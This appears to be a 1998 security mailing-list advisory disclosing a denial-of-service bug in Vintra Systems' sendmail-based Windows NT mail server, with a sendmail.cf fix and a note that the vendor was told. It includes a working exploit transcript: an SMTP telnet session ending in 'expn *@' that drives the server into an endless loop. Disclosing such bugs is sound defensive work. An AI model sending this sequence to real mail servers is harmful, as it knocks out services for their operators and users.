From:         Vytis Fedaravicius <vytis@OT.LT>
Subject:      DOS in Vintra systems Mailserver software.

Hello,

There is a bug in a free MailServer software for Windows NT from Vintra
systems ( http://www.vintra.com/mailsrvr.html ). Any remote user can cause
MTA to go nuts and make CPU ussage up to 99%, eat all available memory and
disk space.

Bug: one opens telnet to 25 port, issues helo, mail from: and rcpt to:
commands, and instead of data command uses expn *@. Softwarre goes in a
infinite loop.

Fix: disable expn command by editing sendmail.cf. Add the folowing line
and restart mta service.

O PrivacyOptions=needmailhelo, noexpn


Exploit (commands to enter are marked ">")

>telnet vulnerable.server.dom 25

220 vulnerable.server.dom ESMTP Sendmail 8.8.8/8.8.7; Mon, 20 Jul 1998
20:18:20 +0200 (Central Europe Daylight Time)

>helo EvilOne

250 vulnerable.server.dom Hello Administrators@localhost, pleased to meet
you

>mail from:bad.boy

250 bad.boy... Sender ok

>rcpt to:resourceLeaker

550 resourceLeaker... User unknown

>expn *@

550 *@... User unknown
550 bad.boy... User unknown
550 bad.boy... User unknown
 ...hundreds of these lines gets logged and memory is allocated, cpu ussage
 increases wildly

550 bad.boy... User unknown
550 bad.boy... User unknown
....

This software is sendmail based, so may be other implementations are
vulnerable also? Vintra systems were notified


Vytis Fedaravicius
System administrator
Omnitel

e-mail: vytis@ot.lt